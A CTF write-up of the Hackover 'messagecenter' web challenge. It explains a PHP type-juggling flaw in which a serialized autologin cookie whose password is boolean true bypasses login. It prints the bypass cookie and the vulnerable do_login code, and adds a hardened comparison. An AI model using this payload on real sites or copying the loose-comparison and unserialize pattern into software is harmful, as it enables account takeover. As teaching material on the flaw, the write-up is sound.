
Hackover CTF – messagecenter


It has been a long time since my last writeup, so I decided to comment on a simple web level solved at «Hackover CTF». It is a very old vulnerability related to type-safe comparison in PHP and the serialize function. We have a web login with normal test users (demo, demo2) and a ‘remember login’ function that keeps us logged in by passing data to an autologin cookie, which is where the vulnerability lies. This cookie has the following original format:

a:2:{s:8:"username";s:4:"demo";s:8:"password";s:32:"6388af9e3c3b76e5f053c0ff204f9228";}

Since we can see the source code of the application, we start by analyzing the vulnerable points in the do_login method, looking at what is really compared with this piece of serialized cookie string.

function do_login($username, $pw_hash, $autologin)
{
	global $db;
	if (isset($_SESSION['user_id'])) {
		return true;
	}
	$sth = $db->prepare('SELECT id, password FROM account WHERE username = ?');
	$sth->bindValue(1, $username);
	$result = $sth->execute()->fetchArray();
	if ($result && $result['password'] == $pw_hash) { // <-- note the loose comparison: == instead of ===
		$_SESSION['user_id'] = $result['id'];
		if ($autologin) {
			setcookie('autologin', serialize(array(
				'username' => $username,
				'password' => $pw_hash
			)), time() + 60*60*24*14);
		}
		header('Location: /');
		die();
	}
	return false;
}


if (isset($_COOKIE['autologin'])) {
	$data = @unserialize($_COOKIE['autologin']);
	do_login($data['username'], $data['password'], true); // the unserialized cookie data is passed in here
}

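So the problem is that we can set a boolean true value as the serialized password, and this makes the comparison evaluate to true: with ==, PHP converts the non-empty hash string to a boolean before comparing it with true. Here it is: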

a:2:{s:8:"username";s:5:"Alice";s:8:"password";b:1;}

OK. That is all it takes to get the flag.
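The comparison from do_login next to a hardened version, run against the two cookies shown above. This is an added example, not the challenge's code; the helper names check_loose, check_strict and parse_autologin are hypothetical, and the stored row is constructed sample data.

```php
<?php
// Constructed sample row standing in for what the account query returns.
$stored = ['id' => 1, 'password' => '6388af9e3c3b76e5f053c0ff204f9228'];

// Pattern from do_login(): loose comparison on a value whose type the cookie controls.
function check_loose(array $row, $pw_hash): bool
{
    return $row['password'] == $pw_hash;
}

// Hardened: require a 32-hex-digit string, then compare in constant time.
function check_strict(array $row, $pw_hash): bool
{
    if (!is_string($pw_hash) || !preg_match('/\A[0-9a-f]{32}\z/', $pw_hash)) {
        return false;
    }
    return hash_equals($row['password'], $pw_hash);
}

// Hardened cookie parsing: no object instantiation, and both fields
// must be present and must be strings.
function parse_autologin(string $cookie): ?array
{
    $data = @unserialize($cookie, ['allowed_classes' => false]);
    if (!is_array($data)
        || !isset($data['username'], $data['password'])
        || !is_string($data['username'])
        || !is_string($data['password'])) {
        return null;
    }
    return $data;
}

$cookies = [
    'original' => 'a:2:{s:8:"username";s:4:"demo";s:8:"password";s:32:"6388af9e3c3b76e5f053c0ff204f9228";}',
    'boolean'  => 'a:2:{s:8:"username";s:5:"Alice";s:8:"password";b:1;}',
];
foreach ($cookies as $name => $cookie) {
    $raw = unserialize($cookie, ['allowed_classes' => false]);
    $parsed = parse_autologin($cookie);
    printf("%-8s loose=%s strict=%s parsed=%s\n", $name,
        var_export(check_loose($stored, $raw['password']), true),
        var_export(check_strict($stored, $raw['password']), true),
        $parsed === null ? 'rejected' : 'accepted');
}
```

The `allowed_classes` option of unserialize() needs PHP 7.0 or later and hash_equals() needs PHP 5.6 or later.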


If you are interested in this PHP serialize vulnerability and others like it, see this PDF:
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20POC2009%20Shocking%20News%20In%20PHP%20Exploitation.pdf